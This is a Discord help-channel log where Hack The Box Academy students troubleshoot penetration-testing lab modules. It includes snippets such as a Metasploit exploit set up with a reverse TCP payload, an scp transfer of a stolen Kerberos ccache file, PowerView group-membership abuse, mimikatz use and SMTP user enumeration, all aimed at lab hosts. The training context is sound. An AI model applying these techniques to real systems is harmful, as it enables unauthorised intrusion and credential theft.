#modules

1 messages ยท Page 63 of 1

low vine
#

So

#

i had to reset the machine 5x

#

eventually worked.......I've had so many problems with machines dying and spending hours not understanding what happened

#

lol

#

just had whats likely a pretty serious rule break, whats best way to get ahold of moderators?

thorn urchin
#

DM an active mod

low vine
#

Well hopefully someone see that

dire eagle
#

anyone else having issues with Remote File Inclusion in file inclusion. The pwnbox display cuts off a lot. And none of the commands on the page work. I put any of them in the box and it gives me a connection timed out. Same thing if I vpn and try it in my vm

unreal patio
#

Am I supposed to use a custom version of mimikatz for the AD skills assessment module or am I overthinking?

#

I uploaded mimikatz 3 times with wget from different places but none of them run even with disabled av

rustic sage
#

I am trying to view the source code for an upload.php file, I'm currently unable to figure out how to find it. I've tried doing an .svg file on a file upload form to be able to read the upload.php source code but am unable to think of a way to be able to view it. if anyone could help it'd be greatly appreciated just send me a dm ๐Ÿ™‚

unreal patio
#

I tried with mimikatz.exe and invoke-mimikatz

#

And both shit themselves

unreal patio
#

@thorn urchin Where did you get mimikatz from?

thorn urchin
#

idr

#

probably standard

#

theres no AV or anything at all preventing it.

unreal patio
#

I've been trying all sort of ways but it doesn't run for me

#

Did you use .exe or invoke?

thorn urchin
#

when I did this is literally just didnt work and was broken, I just used different stuff entirely

unreal patio
#

Just keeps getting stuck there

#

for the 10th time

thorn urchin
#

can always try snagging the one from one of the sections C:\tools

unreal patio
#

Thought of that

#

But it's such a hassle D:

#

But it would save me time xD

#

Even with the snagged versions it's bugging out for me

#

Is it because I'm using a powershell reverse shell with nc?

#

It's what I always do ..

thorn urchin
#

ยฏ_(ใƒ„)_/ยฏ

#

but if the section version doesnt work then def something about your setup thats messing with things

#

try using the cmdline options instead of interactive and redirect output to text file

mighty tartan
#

ok learning the fundamentals to linux and i'm trying to find a file name, but when i try to ls the return i get an error

#

anyone know what i'm doing wrong?

#

long story short, i'm trying to answer this question

#

nevermind, realized i forgot the "\; 2>/dev/null" at the end

unreal patio
#

Time to go get breakfast

winged roost
#

hey all, can someone provide a nudge for the following question: After escalating privileges, locate a file named confidential.txt. Submit the contents of this file. Module: Windows Privilege Escalation - Skills Assessment Part 1 - what ive tried so far: Findstr ( various methods) did find a file called backups - however no access to this directory, but do not think this is the correct way to go about it.

shadow canopy
winged roost
shadow canopy
#

other method finding files with cmd
dir /S /B file.txt

#

I think it searches recursively from directory you're in and under

winged roost
#

@shadow canopy I appreciate your help, it has found the txt file. thank you kindly.

shadow canopy
#

np ๐Ÿ‘

brave palm
#

Module Pivoting, Tunneling, And Port Forwarding - SKILL ASSESMENT :

  • Question 6: "For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation"

Need nudge for this, i dumped the ||lsass|| from ||mlefay win machine|| and found cleartext psw for ||vfrank|| . tried to directly access via mstsc.exe to || vfrank at 172.16.6.35 from the mlefay 172.16.5.35 win machine|| but ended up in the same machine with just the new user, didnt manage to pivot to the actual machine, any help? kinda confused

opaque niche
brave palm
brave palm
#

dope

#

i'll try to understand how to get there haha

opaque niche
brave palm
opaque niche
livid flume
#

could anyone @everyone help me out what will be the key input for the capture the flag :hackweek event which is going to start on 23march.....i couldn't join cause its promoting with input key to add

autumn pilot
#

if you don't have it, then you cannot join

livid flume
#

how to get that

autumn pilot
#

only the organizers can give you the key

unreal patio
#

How do I fix this?

clever cosmos
#

Hey everyone! I could really use some help with a Twig SSTI challenge. For some reason injecting {{_self}} or {{_self.env}} errors out. I am failing to retrieve the environment variables

lone hemlock
#

I need help with Attacking SQL Databases please DM me

unreal patio
#

Can someone give me a pointer for the last question in Active directory Skill assessment 1?

clever cosmos
unreal patio
#

I ran it as admin and privilege::debug gives 20

clever cosmos
#

Did you token::elevate?

unreal patio
#

I have once, but not now

#

Same error

clever cosmos
#

Also there could be an issue with the version of mimikatz

#

Sometimes using an older version works

rustic sage
#

I got a problem with section Web Server Pivoting with Rpivot in the module Pivoting, Tunneling, and Port Forwarding. The command proxychains firefox-esr 172.16.5.135:80 doesn't work for me. I get a lot of errors and firefox won't load that page, even though the rpivot server-client connection has been setup properly and is running. Instead of proxychains firefox-esr 172.16.5.135:80 I used curl: proxychains curl http://172.16.5.135:80 which gets me the page. I saw a fragment which probably is the flag: || I_L0v3_Pr0xy_Ch@ins||, but it's not accepted as the answer. I can't see anything else with curl.

rustic sage
tiny ledge
#

Any help with Hacking Wordpress, the very first assignment, I'm supposed to look through directories mentioned in the instruction for Flag.txt, went through all of them (only like 2 worked) and cant find anything EDIT: 'Manually enumerate' yeah right, bs instruction as usually

urban anvil
#

Hi guys I am solving the module Password Attacks and the section Pass The Ticket(linux). In the optional exercise the question is "Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished." I am using the following scp command "scp /tmp/krb5cc_647401106_HRJDux kali@10.10.14.161:/home/kali" But i am not able to transfer the ccache file

winged roost
naive sky
#

does any body finished XSS please ?, i want to ask phising part stuck their i dont know what to do at this part confused to get the flag

livid bluff
#

Hi,
I'm stuck in socks5 tunneling with chisel in the pivoting module.
When i want open chisel on the pivot target i have this error :

ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)

I see we need instal lib6 :

sudo apt-get install libc6

But it's not possible on the target host.

Anyone have another solution ?

opaque niche
livid bluff
proud cloak
#

I am having trouble with ACADEMY-EA-DB01 host (172.16.5.150) is it working ?

#

I need the last flag of privileged access section

livid bluff
sonic ferry
#

Regarding "Skills Assessment - File Upload Attacks". I'm not finding any way to come up with a POST request. I believe the ||image upload form|| should be the target, but I can't really do much without any POST requests. Any help?

EDIT: FFS... It seems that the browser in the pwnbox somehow filters the POST request through. Tried with my own VM with no troubles at all. Once again spent an hour trying to figure out a thing that wasn't even a thing.

opaque niche
livid bluff
# opaque niche mm, as far as I remember, use the chisel 1.7.4 binary on the HTB machine, with t...

I just saw, on the forum they also advise the version 1.7.4 but for me it gives me the same result.
I am completely blocked ...
I try other techniques to recover the flag but nothing works

scp ~/Tools/chisel-1.7.4/chisel ubuntu@10.129.114.95:~/
ubuntu@WEB01:~$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
urban anvil
#

hi guys i need help with Pass the Ticket(Linux) Optional Exercise

opaque niche
livid bluff
opaque niche
livid bluff
# opaque niche and the name of the file?

I downloaded the zip with 1.7.4 verison and build as it is indicated in the course

cd chisel-1.7.4
go build
scp ~/Tools/chisel-1.7.4/chisel ubuntu@10.129.114.95:~/
ubuntu@WEB01:~$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
opaque niche
#

and then you make the transfer

#

do not build this version of chisel on your machine

livid bluff
#

Oh wait is good ! I try to continue !

lost pecan
#

Hi, I'm doing the Getting Started module. I've been able to do the manual way, but for the life of me, Metasploit doesn't work. LHOST is pointed to tun0:4444

livid bluff
opaque niche
analog tendon
silent radish
#

Hey, I am currently at the Knowledge-Check of the getting started section. I found the admin credentials and was able to log in as admin.

Also, I found an exploit on MetaSploit for GetSimple v. 3.3.15:
exploit/multi/http/getsimplecms_unauth_code_exec

My options are:
Module options (exploit/multi/http/getsimplecms_unauth_code_exec):

Name Current Setting Required Description


Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.129.114.223 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the cms
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description


LHOST 10.10.16.3 yes The listen address (an interface may be specified)
LPORT 1337 yes The listen port

When I run this exploit, I get this:

[*] Started reverse TCP handler on 10.10.16.3:1337
[*] Exploit completed, but no session was created.

Can somebody give me a hint what I might be doing wrong / should (re)consider?

ripe grove
#

I'm working on AD Enum&Attacks: Attacking Domain Trusts - Child -> Parent Trusts from Linux. I'm trying to get the NTLM hash for the domain admin bross. I've created a golden ticket. I can login to the DC with psexec, but I can't get secretsdump to work to grab the hash. Shouldn't I be able to do a DCSync with secretsdump?

ripe grove
#

I think I figured it out. Anyone else that may have this issue, the golden ticket seems to expire after a short time and you may need to run secretsdump shortly after generating the golden ticket to have it work

quiet ember
barren robin
rustic sage
#

1v1 anyone?

#

or 2v2?

silent radish
silent radish
high sentinel
rustic sage
#

1v1?

high sentinel
#

yeah sure ๐Ÿ˜„

#

what's the target? ๐Ÿ˜„

rustic sage
#

cyber mayhem

high sentinel
#

ok ๐Ÿ˜„

rustic sage
#

why do you keep doing that emoji

barren robin
rustic sage
thorn urchin
#

yo, this channel is for module and academy discussion only

winged roost
#

yes, i believe so

barren stag
#

Hey, just joined. I'm having a problem with the "starting point" submit root flag. Hopefully I put this in the correct thread ๐Ÿ˜…

thorn urchin
winged roost
cunning marsh
#

anyone know the userlist for Attacking Common Services - Easy

thorn urchin
cunning marsh
#

I know its ||smtp|| but the resources provided isnt working

thorn urchin
#

you use the provided word list

#

if it isnt working then your method is incorrect

cunning marsh
#

||smtp-user-enum -w 25 -M RCPT -U users.list -t 10.129.203.7 -v ||

#

this?

thorn urchin
#

idr which method was the correct one. Id have to go back and redo the section

#

but only one of the three ways it discusses will work

cunning marsh
thorn urchin
#

ye

cunning marsh
#

great thanks

winged roost
distant tinsel
#

Hi i keep getting this error when trying to damundsen to help desk level 1 group in ad attacks and enum and its just so hard to troubleshoot alot of this active dir stuff

#
At C:\Tools\PowerView.ps1:11684 char:17
+                 $Group.Members.Add($Member)
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : PrincipalExistsException```
thorn urchin
#

include your full command, just the error is kinda useless to us.

Also for formatting you can enclose it in triple backticks ` it makes it more readable.

c:\ mypowershell.ps1 -Argument args
distant tinsel
#

Command was ```Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2

thorn urchin
#

sounds like the user has already been added to the group

distant tinsel
#

seriously but that was the first time i did the command let me scan the members rq

#

active directory stuff is so hard for me to troubleshoot on my own because google does not help

thorn urchin
#

AD aint easy, this module is widely regarded as the hardest module in the path for good reason, and its not because of the quality

distant tinsel
#

ty makes me feel less bad for struggling

thorn urchin
#

theres an AD fundementals course on academy as well that takes you through actually configuring one n stuff that may be worthwhile. I havnt done it but Ive considered it.

wheat scaffold
#

hello. Do I need to register another account for the academy part of the site?

thorn urchin
#

yea

hasty solar
#

Hi anoyone could gave me ideas for Attacking Common Services - Easy, tried bruteforcing with resources list all the services and for now found nothing, enumerated quite well port 80 but I dont think is an exploitation way, the port 443 is http simple auth til had not tried via that port, in conclusion what should I try next?, thanks in advance

thorn urchin
#

unfortunately my notes are sparse on that one, but those labs ratings are out of order. the Easy one is actually the hardest lab. So if you get too frustrated go clear the medium and hard labs first.

hasty solar
#

ok

rustic sage
half inlet
#

This is is the command: ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://IP:PORT/admin/admin.php?FUZZ=key

#

But this is not working at im not sure why

balmy radish
#

remove the slash after ip

half inlet
#

I did it puts it on discord not sure why

thorn urchin
#

use triple backticks ` for formatting in discord

#
so looks like this
hallow remnant
#

Could I ping someone for some assistance w.r.t. AD Enumeration & Attacks - Skills Assessment Part II?

#

Specifically, Q8: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

half inlet
#

I think the issue is that I need to scan admin.academy.htb but idk how to get the ip for that

#

I used subdomain fuzzing to find that it exists, but I canโ€™t locate to it, so Iโ€™m guessing I need an ip to add to my dns?

acoustic owl
autumn pilot
#

you fuzz using the IP that you are provided with

half inlet
#

Ok let me try

thorn urchin
#

multiple sites and subdomains can exist on the same IP afterall ๐Ÿ™‚

half inlet
#

How do I access the other site on the same domain? I donโ€™t understand

#

@thorn urchin

half inlet
thorn urchin
#

add it to your /etc/hosts

#

might not be a real site btw

half inlet
#

But itโ€™s the same ip is the problem

#

Will it still work even if itโ€™s the same ip?

thorn urchin
#

that's not a problem

half inlet
#

Oh ok

#

Let me try

thorn urchin
#

thats how vhosts work

#

just again, it may not be a real site anyways

#

so it you dont get anything even after adding to /etc/hosts its possible its because theres nothing to get.

half inlet
#

Ohhhh okay!!

#

It worked thank you (:

thorn urchin
#

heres more info on the topic

#

its one of those foundational knowledges the modules assumes you already know

half inlet
#

Ah okay

#

Ill check it out

wheat garden
#

Is there a specific discord channel to discuss pro labs in particular Dante? Thinking about starting that one

autumn pilot
opal jewel
#

Imagine trying to finish assessment on SNMP and the provided IP address does not have pop3/imap/snmp open. HARD Reset kek

#

Also. Now that I reset the instance, the same syntax I used to answer Q1 no longer works (which worked previously) szycat

opal jewel
#

Ok. Yeah. Anyone elese having issues with Attacking Services - SNMP?!

#

Ports are open, I go to brute-force for valid user, they close.

fathom pendant
#

try slowing down your threads for brute forcing :)

opal jewel
#

Show cased tool and intended tool doesnt have threading

#

I guess processes is threading. It worked first time just fine

hallow remnant
#

Is there anyone that could grant me some assistance w.r.t. AD Enumeration & Attacks - Skills Assessment Part II?

I have compromised SQL01 (SYSTEM priv), I have the Administrator's hash and found a password Su...rE, but I don't know what I'm meant to do from here to attain Admin privileges back on MS01.

devout torrent
#

Can anybody explain why my windows firewall in detecting a Backdoor:PHP/Remoteshell.F on SQL injection fundamentals cheat sheet download ๐Ÿ˜„

#

Or more if anybody else is having that problem

acoustic owl
north mica
fathom pendant
#

^ defender is doing it's job as the code snippet - indeed - would be considered a backdoor if used maliciously

devout torrent
#

๐Ÿ˜› I checked later that its safe, i was just baffled why it gives the error

#

Thanks for the info boys

fathom pendant
#

this is why my notes and things are in a folder that I've whitelisted for defender

rustic sage
#

Has anyone completed File Inclusions Skill Assessment? ||I've searched the website and could only find the p... parameter and a m...... parameter but couldn't exploit them... I tried fuzzing for other php pages and then fuzzing those for parameters but nothing|| any hints? ||fuzzing for post parameters but nothing yet||

fathom pendant
#

It would suck if your notes suddenly disappeared because defender was just doing it's job

acoustic owl
acoustic owl
devout torrent
#

Woops bunny was faster

rustic sage
#

ahh I see thx!!!

hallow remnant
thorn urchin
hallow remnant
thorn urchin
#

Ye, that password IS used somewhere, unfortunately just no way to tell you where without just spoiling it.

fossil crescent
#

On the skills assessment for Active Directory Bloodhound, "Find the percentage of users with a path to GLBOAL ADMINSITRATOR" -- how? I conceptually knew what I was trying to do (neo4j cypher query wise, but failed), brute-forced the value, back-tracked to how it is derived, but still (a) can't figure out a query that would generate it for me (even though I do have queries that will generate a %), and (b) can't figure out how to automatically calculate the numerator of the equation (I can look in bloodhound and manually count)...

acoustic owl
fossil crescent
acoustic owl
rustic sage
#

okay I'm on the last step of File Inclusion Skill Assessment and I know what I have to do... only problem is does anyone elses lab instance die immediately ||after doing a log poisoning attack?I can successfully poison the logs, but shortly after executing the command like id the lab crashes||

rustic sage
#

well I have to it crashes and that's the only option๐Ÿ˜‚ but during the section from earlier it did that as well. It crashes as soon as I execute

thorn urchin
fossil crescent
thorn urchin
#

its usually my option of last resort.

hallow remnant
#

@thorn urchin ...oh my lord. Shoot me in the face...

And here I was going "bUt I aLrEaDy SiGnEd In To MsSqL..."

rustic sage
hallow remnant
#

A break through, but an embarassing one. Thanks for humoring me

thorn urchin
#

hey you got it though!

rustic sage
#

could I DM someone about this I swear it's the labs fault but I want to confirm

thorn urchin
rustic sage
#

well it's not even bricking atm but the logs aren't populating. I'll try another restart

#

this is so frustrating๐Ÿ˜ซ

#

OMG FINALLY

#

that was such a pain๐Ÿ˜ญ

thorn urchin
#

remember if the box itself isnt bricked you can check the error.log to see the php error message about what went wrong.

rustic sage
#

I did forget about that, but the issue was mainly the box dying lol

sly tapir
#

Password Attacks - Medium: I am stuck trying to get root. I am logged in as d*****. looked at .bash_history, and rsa keys..but im not having any luck...any hints would be appreciated...

jaunty vigil
#

AD Enum and Attacks - LOTL utilizing techniques learned in this section find the flag hidden in the description field of a disabled account with administrative privileges.

#

anyone up for some help?'

crystal jackal
#

Hello, I am new to hack the box and am running into a little issue on my terminal. Can anyone guide me in the right direction?

magic valve
#

May I have some assistance with Pivoting, Tunneling, and Port Forwarding - Skills Assessment Question 6?

When I RDP into the found 172.16.6.XX with found users credentials from previous questions the machine has the same folders/files/flag as question 4.

I'm a little lost.

Disregard - I figured it out. Thank you guys anyway.

thorn urchin
carmine linden
#

hi

analog tendon
#

case 5 on the sqlmap i was able to get the flag but it doesnt seem to be accepting it. anyone else having this issue?

#

nvm it replaced one of the letters with } but i was able to make a decent guess as to what it was

thorn urchin
#

if thats one of the time based ones then yeah sometimes it just isnt perfect and you have to do a little human guesswork

analog tendon
#

yea it was one of the OR time based payloads.

thorn urchin
#

yup normal issue with that vuln type

naive sky
#

whats wrong guys?

#

any help please?

devout torrent
#

I think its not called csrf-token on the assignment ( not at home so i cannot check my notes) @naive sky

untold forge
#

I am running into problem with how to use some tools with the IP:PORT format for the target machines for nmap I have tried a few combinations but they are not working for me saying host down or cannot resolve. For example "nmap -p- -sV -sC 173.43.23.140:30921". Am i missing something?

#

I have tried looking at exmples but they use ip's without the :port so not sure if im doing it wrong

faint rampart
untold forge
#

that port is the docker ip right? I dont wana scan that port but how i connect to it

#

its what i enter into the url and when i just use the IP nothing

untold forge
#

thats whats confusing me

devout torrent
faint rampart
# untold forge the target ip is given to me as x.x.x.x:30245 for example

You could specify what section youre in so someone can better understand how to help, but from experience since starting academy, only a specific service runs on a docker host on a port and thats the only service of interest for the specific assessment, in that case there is no need for a port scan cause thats the only port youre asked to carry out the task on.

untold forge
#

In my mind i access the target through IP:PORT then once there the machine still had all the normal ports. So was little confused. Got it now thank you!

grand harbor
#

Hello can someone help me with this module, im doing password attacks where i need to bruteforce a ssh login with a custom wordlist. it has 94k words so it takes like 3 hours to fully bruteforce the login. Can someone give me the first letter of the password so the bruteforce will go a little bit faster?

autumn pilot
#

filter the words that start with 'B' and create an additional wordlist based on that

native comet
#

Active Directory Assesment 2 ""Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What this user's account name? "" I found the Username but i am stuck on finding/dumping the hashes
Any suggestions?

autumn pilot
#

with genericall you can force change a user's password

native comet
#

@autumn pilot yes but if i do that its gonna change the hash and the question asked is Crack this user's password hash and submit the cleartext password as your answer.

#

i did a bloodhound sweep and was able to get the username C****

native comet
#

nvm got it

rustic sage
livid bluff
rustic sage
#

I downloaded 1.6.0 and it worked immediately.

#

They should really update this box.

rustic sage
#

Hello guys somedoby know if i can use proxychains with the vpn of htb?

autumn pilot
#

it is explained in pivoting, tunneling and else module

rustic sage
#

it is so harder

tiny ledge
#

Trying to run WPScan on target of WordPres Skills Assessment, but getting: Scan Aborted: The remote website is up, but does not seem to be running WordPress.

Shouldn't they put WP website on the WP skills assessment

jaunty vigil
#

you need to find it ๐Ÿ˜„

tiny ledge
jaunty vigil
#

directory search the page

#

use something like dirsearch or gobuster or something

tiny ledge
rustic sage
weak stirrup
#

question: I am working on the "Firewall and IDS/IPS Evasion Easy Lab" There is a status page given to me that displays how many 'recorded alerts' the system gets. before i start doing anything i have 16 alerts and the number grew to 100 in just a few seconds (i refreshed the page a bunch) and I was 'banned for 3 minutes'. but I did not even begin to run my own commands. is this normal?

livid bluff
crude drift
#

guys im having problems downloading the openvpn

rustic sage
crude drift
#

thx

rustic sage
livid bluff
#

I'm stuck on the skill evaluation - Pivot, tunnel and port forwarding.
I got the lsass.dmp file and recovered the hash of vfrank on my kali but I can't find a word list that works to crack the hash

timber hatch
#

anybody an idea why this error occrus?

opaque niche
livid bluff
opaque niche
little mauve
#

Hello can any one teach me how to post code on here correctly? Please

halcyon falcon
#

Hi guys, can anyone explain what Security Least Access is, I don't understand

livid bluff
turbid tartan
#

Yo im stuck on Pivoting first one. how do i enter rdp. I tried following all the steps from the module but i dont get it

low vine
#

Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag? I've re-encoded the cookie as the "super user" and it still does not allow me in, what might I be missing here?

#

I'm in but dont have the flag so I'm confused what to do at this point

fathom pendant
#

if it's a docker image you generally cannot nmap those

brave palm
#

Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Kerberoasting - from Linux

Question: Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.

I tried the commands on that page, but it asks me for a password in order to get those TGS tickets, am i supposed to dump some hashes and crack them?

fathom pendant
keen ridge
#

I got stuck in first module/Vulnerability Assessment. The question is: "What type of analysis can be used to predict future probabilities? " and my answer was: "Predictive Analysis". It would be great if someone can help

fathom pendant
keen ridge
naive sky
#

For sqlmap

low vine
#

lol

naive sky
#

Skill assessment styckt

fathom pendant
#

haven't done that; don't just reply to me on something unrelated to your issue

naive sky
#

Some body done that ?

fathom pendant
#

if you're stuck, reread the module and double check you're doing everything right instead of just copy/paste

naive sky
#

I have read it

#

But I got stuck which tamper to use

#

There are alot

#

It's not effective to use one by one

fathom pendant
#

then keep trying while you wait for someone to assist you

naive sky
#

But the chat would gone

fathom pendant
#

it still exists

naive sky
#

How could some oneknowz

fathom pendant
#

the chat doesn't just "disappear"

desert stump
#

Anyone here completed the CrackMapExec Module ?

naive sky
#

Because many of questions I have asked before no body response : ๐Ÿ˜ญ

#

Really sad

fathom pendant
#

people will scroll up and read if they are wanting to help; i know a handful of people that just lurk in here JUST to answer questions

#

but you're also banking on complete strangers as well to just help you out

#

also your questions in the past have been bad questions. you're either restating the exact question from the module or not giving enough context to actually get an answer so most people don't bother to even try (which sucks I know).

low vine
#

zegaf its going to be okay I asked a question a while ago and if nobody answers I'm just gonna keep working on it and try to figure it out. If nobody responds in an hour I might repost it but no need to spam

#

Yes its frustrating sometimes and sometimes we just want immediate help and answers but I promise it will be okay.

fathom pendant
#

while I will just simply paste/type in http://dontasktoask.com - it's not 100% to be a dick about it, it's a way of saying - take a look at this, then at your question and ask yourself - is this phrased in a way that would get me my answer

#

there is also a link on the dontasktoask page to something known as the xy problem; which I also recommend taking a look it

turbid tartan
#

im still stuck on the first section pivoting, tunneling and port forwarding. I dont get what i am doing wrong i tried everythin step by step but it doenst work. any tips?

autumn pilot
#

as long as your proxychains conf is correct, you will be good to go

fathom pendant
#

^

#

just make sure your proxychains.conf file is correct

#

you may need to comment out the other proxy mode - not sure if that plays a role - but I had issues when I had both of them on. But it could just be that my vm was being weird

turbid tartan
#

what means correct

autumn pilot
#

if you are trying to use port 9050 within your ssh command and that port is not configured in your proxychains conf, then it will simply not work

fathom pendant
#

correct means that in your /etc/proxychains.conf file if you do
tail /etc/proxychains.conf you see

socks4 127.0.0.1 9050
socks5 127.0.0.1 1080

if you're on the first section then at the moment I believe they only want you to do the socks4 9050 - but what is that section called so I can take a look?

turbid tartan
#

Dynamic Port Forwarding with SSH and SOCKS Tunneling

fathom pendant
#

read that part of the module

#

:)

turbid tartan
#

but my in my proxychains config i just have
socks4 172.0.0.1 9050

fathom pendant
#

then edit the proxychains.conf

turbid tartan
#

yeah i did multiple times

fathom pendant
#

because it should be 127, not 172

turbid tartan
#

oh yeah i mistyped sorry

fathom pendant
#

anyway what are you saying is going on that is making it not work?

patent hawk
#

Hi everyone, just need a clarification regarding the test in the metasploit module about payloads. How can I guess that the remote machine is running Apache Druid only knowing this nmap report :

โ””โ”€โ”€โ•ผ $nmap -sV -Pn -p-10000 10.129.203.52
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 17:04 CET
Nmap scan report for 10.129.203.52
Host is up (0.025s latency).
Not shown: 9993 closed tcp ports (conn-refused)
PORT     STATE SERVICE   VERSION
22/tcp   open  ssh       OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
2181/tcp open  zookeeper Zookeeper 3.4.14-4c25d480e66aadd371de8bd2fd8da255ac140bcf (Built on 03/06/2019)
8081/tcp open  http      Jetty 9.4.12.v20180830
8082/tcp open  http      Jetty 9.4.12.v20180830
8083/tcp open  http      Jetty 9.4.12.v20180830
8091/tcp open  http      Jetty 9.4.12.v20180830
8888/tcp open  http      Jetty 9.4.12.v20180830
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.39 seconds

I've seen that Apache Druid uses Apache Zookeeper, is there an information here telling me that the remote is running Druid ?

fathom pendant
#

you can also try doing whatweb <IP>:port

#

sometimes it's either just knowing services or google

patent hawk
#

Indeed ! Thant you very much ๐Ÿ™‚

turbid tartan
#

omfg i just had to keep ssh open

#

im dumb sorr

#

y

#

that makes sense

fathom pendant
turbid tartan
#

yeah thats why i tought like putting in the ssh server

#

in the proxychainsconfig

#

but now this makes more sense

fathom pendant
#

It's always the simpler way

naive sky
#

i got the flag but when i submitted why its wrong

#

any help?

sly tapir
naive sky
#

no it was fine same clearly

#

its really weird

#

could i dm ?

timber hatch
#

wrong flag for that question?
Log out and log in?
refresh?

naive sky
#

same ๐Ÿ˜ข

elfin loom
#

is flag format correct? space may throw the validation

naive sky
#

its correct, but says incorrect

rancid rampart
#

Ok, PEBCAK.
Stuck on Password Attacks Medium Lab.
Unable to take advantage of ssh keys found with user d***** . Read through most of the previous hint. Going nowhere.
Would be great if someone could assist (DM).

fathom pendant
#

you do a lot of back and forth in the labs i take it the ssh key is password locked? If only there was a way to crack it

naive sky
elfin loom
iron rune
#

I've had it say the flag was wrong a few times, I just kept submitting until it accepted it

naive sky
#

what is wrong?

rancid rampart
#

@fathom pendant
Indeed. That was my first approach. Used john, hashcat, etc from the modules with resources list and other lists. Nadda.
So, looked at the history of user and attempted to mimick for ssh. No go.

tribal linden
#

hey guys im on the attacking common services module and trying to do the mssql stuff. I have a password for mssqlsvc, but can't log in to see flagdb. Can anyone help :)?

sly tapir
# naive sky

Im not sureโ€ฆ did you open that .csv file? Just in caseโ€ฆ

naive sky
#

really dissapointed

sly tapir
#

I think i had this before and restarted the machineโ€ฆ i canโ€™t remember though because i did it along time ago before i started taking good notes

low vine
#

I've had to reset stuff a bunch dont be afraid to mark down how you got there and just reset it. Super frustrating at times I 100% feel you but dont be afraid to reset shit or you will spend hours getting nowhere like me

rancid rampart
#

@fathom pendant
Nevermind; figured it out!

analog scarab
#

hi guys i am

naive sky
#

really i hate this errors

#

actually whats wrong

bright abyss
#

Guys how do I start vpn on windows?

naive sky
#

Did you understand from the picture

analog tendon
#

no about 50 percent througfh

#

i cant see the pic

#

too small

naive sky
#

Then same

#

Bro

#

Let me dm you is it ok?

analog tendon
#

ok

pulsar yoke
#

How do i use the (new) cloudflare WAF Firewall bypass on Metasploit Kali Linux?

thorn urchin
#

what module

lucid marsh
#

hey guys, How Can I reach out to HTB Academy via email? When I try to log into the academy, asks for 2FA OTP code, But I dont have access to it anymore

thorn urchin
#

click on the support chat bubble

#

if you dont see it, disable ad block

pliant light
#

Anyone able to help with the SQL Injection Fundamentals Skills Assessment? Found the directory I can write to, and read the source code for index, dashboard, and the config file but unsure of where to go next. EDIT: nvm. figured it out. There was something I thought I tried earlier that ended up working. Sigh

lucid marsh
thorn urchin
#

yes

#

if its still not there you can try the support bubble on the main site

rustic sage
#

yo guys

lucid marsh
#

I cant see the support bubble on htb academy's site

#

(disabled addblock)

fathom pendant
rustic sage
#

i'm having some trouble with file upload attacks -blacklist filters nvm... I swear I tried this filter earlier and it didn't work but second time it didFeelsBadMan

brave palm
brave palm
#

like this? haah

thorn urchin
#

the goal of the section is to learn the methodology of finding the answer, so telling someone the answer defeats the point.

#

no, like you shouldn't have it even in spoiler tags

brave palm
#

my bad, i didnt think it could've been that spoliery

thorn urchin
#

in some other modules it might not have been, but this one heavily focuses on the process of discovery, so telling a working extension skips the point.

#

be like on the enumeration module telling someone what high level port service they missed instead of how they couldve found it.

brave palm
#

this is gonna be fine

#

hahaha

thorn urchin
#

yeah that might be better lol

brave palm
#

hahaha yeah

low vine
#

Having some dumb trouble ran out of time doing last question on wordpress assessment. I have switched out my /etc/hosts/ for the new IP and i'm not able to get back in

#

of course after I post it immediately works lol

#

nvm

thorn urchin
#

sometimes parts of the lab take a little longer to spin up

brave palm
#

I'm doing the** Active Directory Enumeration & Attacks** module, i'm at the Kerberoasting with Linux section and i didnt understand if i first have to find some hashes somewhere else and crack them before trying the suggested tool in this section, I mean i tried it but it prompts me a password for the win user which i dont know.
the exercise is this: Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.

thorn urchin
brave palm
#

thank you i'll double check that later

raw sierra
#

hi

rustic sage
brave palm
naive sky
#

it should be there mentor to help students problem like what i faced here

acoustic owl
naive sky
#

oh i see

#

if students subscription isnt there ?

acoustic owl
naive sky
#

so sad

ripe grove
#

In attackng web apps with ffuf>DNS Records, it describes setting academy.htb to the ip in etc/hosts, but then it goes on to say that we now get the same web site with academy.htb that we got with the IP, so it seems to conclude that this proves that academy.htb is the same domain we've been testing. But we set the IP in hosts. How does this prove it?

acoustic owl
# naive sky so sad

Do not be sad.
If you ask your question here in the chat, I am almost sure you will get appropriate help.

naive sky
#

iam sad because got mad not solved , and dont know what is the problem

acoustic owl
acoustic owl
ripe grove
#

